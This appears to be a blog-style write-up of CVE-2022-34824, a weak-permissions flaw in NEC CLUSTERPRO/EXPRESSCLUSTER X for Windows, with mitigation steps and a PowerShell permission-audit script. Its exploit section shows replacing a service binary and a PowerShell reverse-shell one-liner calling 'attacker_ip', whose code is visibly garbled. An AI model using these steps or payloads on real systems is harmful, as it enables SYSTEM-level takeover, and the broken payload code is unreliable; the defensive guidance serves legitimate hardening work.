Security flaws can often hide in plain sight. One such overlooked risk is improper file and folder permissions. CVE-2022-34824 is a textbook example—if you're running CLUSTERPRO X 5. or EXPRESSCLUSTER X 5. (even SingleServerSafe editions!) for Windows, you might be letting hackers right into your system. Let's break down what happened, take a peek at possible exploits, and learn how to keep your systems safe.

EXPRESSCLUSTER X 5. SingleServerSafe for Windows _and earlier_

Vendor: NEC (Nippon Electric Company)  
Official advisory link

Short story: These products use weak permissions on some folders and files. Remote, unauthenticated attackers can overwrite files—and that means potentially running whatever code they like, disguised as trusted programs.

How Does This Happen?

A lot of applications install with full write permissions (like Everyone: Full Control) on their folders or log files. Normally, only admins should be able to change important files. But with weak permissions, any local or even remote user can mess with them.

Suppose the application runs as SYSTEM (which is super powerful!). If an attacker can swap out a .exe, .dll, or even a config file with their own code, the app will run their code as SYSTEM next time it's started.

Exploit Walkthrough

Here’s a simplified walkthrough of how someone might take advantage. This example assumes the vulnerable folder is world-writable and the CLUSTERPRO/EXPRESSCLUSTER service runs as SYSTEM.

First, find an application folder with poor permissions. You can check permissions from the terminal:

icacls "C:\Program Files\CLUSTERPRO\bin"

If you see something like:

Everyone:(OI)(CI)(F)

it means everyone can read, write, and modify everything inside (the (OI)(CI) flags make the entry inherit to every file and subfolder below).

Step 2: Drop a Malicious File

Suppose there’s an executable svc.exe that runs as part of the cluster service.

You could create your own malicious payload (e.g., attack.exe) and replace the legitimate file:

copy attack.exe "C:\Program Files\CLUSTERPRO\bin\svc.exe" /Y

Step 3: Wait for Execution

Restart the affected cluster service or system. When the service runs svc.exe (now your malware), it executes with SYSTEM privileges.

Weaponized Example

Here’s a (simplified) code snippet that demonstrates planting a reverse-shell payload as a replacement:

# attacker-prepped PowerShell payload for reverse shell
$code = 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\'attacker_ip\',4444);$stream = $client.GetStream();[byte[]]$bytes = ..65535|%{};while(($i = $stream.Read($bytes, , $bytes.Length)) -ne ){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,,$sendbyte.Length);$stream.Flush()};$client.Close()"'

# build malicious executable that runs this payload (use msbuild, msfvenom, or a code editor)
# save as attack.exe

# now replace the legitimate binary
Copy-Item -Path "attack.exe" -Destination "C:\Program Files\CLUSTERPRO\bin\svc.exe" -Force

Why Is This So Bad?

Remote, unauthenticated attacker  
If the weak directory is shared or exposed to the network, a remote attacker who isn't even logged in can overwrite critical files.

Privilege escalation  
If the cluster service runs as SYSTEM (many cluster managers do), the attacker can gain the highest privileges on the system.

Lateral movement  
Attackers could use the compromised system to move throughout your network.

Official References

- JVN#38853430: CLUSTERPRO/EXPRESSCLUSTER X Insufficient Access Control Vulnerabilities
- NEC ExpressCluster vulnerability info (same as above)
- CVE Details for CVE-2022-34824

Mitigation & Fix

Patches:  
Check for official updates or hotfixes from NEC and apply them immediately.

Manual Fix:
Until the update is applied, tighten the permissions yourself: strip inherited entries, remove the Everyone entry, and grant Full Control only to Administrators and SYSTEM. Run it from an elevated prompt. Note that the form below changes the top-level folder only: add /T to rewrite every file and subfolder (entries set directly on individual files are otherwise left alone), use "Administrators:(OI)(CI)F" and "SYSTEM:(OI)(CI)F" if the grants should flow down to the contents, and test on a standby node first, since the service must still be able to read its own files.

Example:

icacls "C:\Program Files\CLUSTERPRO" /inheritance:r /grant:r "Administrators:F" /grant:r "SYSTEM:F" /remove "Everyone"

Audit:
Regularly run permission audits on all server application folders!
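The audit step can be scripted. The PowerShell below is an added example written for this post, not NEC's tooling; it assumes the install path C:\Program Files\CLUSTERPRO (change $Root as needed) and flags any Allow entry that gives Everyone, Authenticated Users, Users or INTERACTIVE a write-type right anywhere under that tree, which is the same condition the icacls check above looks for by eye.

```powershell
# Added audit script (not NEC's code). Walks a folder tree and reports Allow ACEs that
# give broad principals any write-type right. The install path below is an assumption.
param([string]$Root = 'C:\Program Files\CLUSTERPRO')

# Compared by well-known SID rather than name so the check also works on localized Windows.
$BroadSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
    'S-1-5-4'      = 'INTERACTIVE'
}

# Any of these rights lets a non-admin replace or alter what a SYSTEM service will load.
# GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000) are added because some ACEs use
# generic masks that the FileSystemRights enum does not name.
$FSR = [System.Security.AccessControl.FileSystemRights]
$WriteMask = [int]($FSR::Write -bor $FSR::Modify -bor $FSR::FullControl -bor $FSR::Delete -bor
                   $FSR::ChangePermissions -bor $FSR::TakeOwnership) -bor 0x40000000 -bor 0x10000000

function Find-WeakAce {
    param([string]$Path)
    $items = @(Get-Item -LiteralPath $Path -Force) +
             @(Get-ChildItem -LiteralPath $Path -Recurse -Force -ErrorAction SilentlyContinue)
    foreach ($item in $items) {
        $acl = Get-Acl -LiteralPath $item.FullName -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            try {
                $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
            } catch { continue }   # orphaned or untranslatable identity: nothing to compare
            if (-not $BroadSids.ContainsKey($sid)) { continue }
            if (([int]$ace.FileSystemRights -band $WriteMask) -eq 0) { continue }
            [pscustomobject]@{
                Path      = $item.FullName
                Principal = $BroadSids[$sid]
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited   # False means the entry was set on this item directly
            }
        }
    }
}

$findings = @(Find-WeakAce -Path $Root)
if ($findings.Count -gt 0) {
    $findings | Format-Table -AutoSize
    Write-Warning "$($findings.Count) ACE(s) grant broad write access under $Root"
} else {
    Write-Host "No broad write access found under $Root"
}
```

Entries reported with Inherited = False will survive a top-level icacls fix that lacks /T, so they are the ones to clean up individually.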

Conclusion

CVE-2022-34824 proves how a simple misconfiguration can hand over the keys to your kingdom. Always lock down your app folders, especially if they contain executables or configuration files. Patching and good permission hygiene are your best friends.

If you use CLUSTERPRO X, EXPRESSCLUSTER X, or SingleServerSafe on Windows—patch now and check those folder permissions!


_Curious to learn more or share a story? Contact NEC support page or follow security updates at your vendor’s site._

Timeline

Published on: 11/08/2022 22:15:00 UTC
Last modified on: 11/09/2022 16:30:00 UTC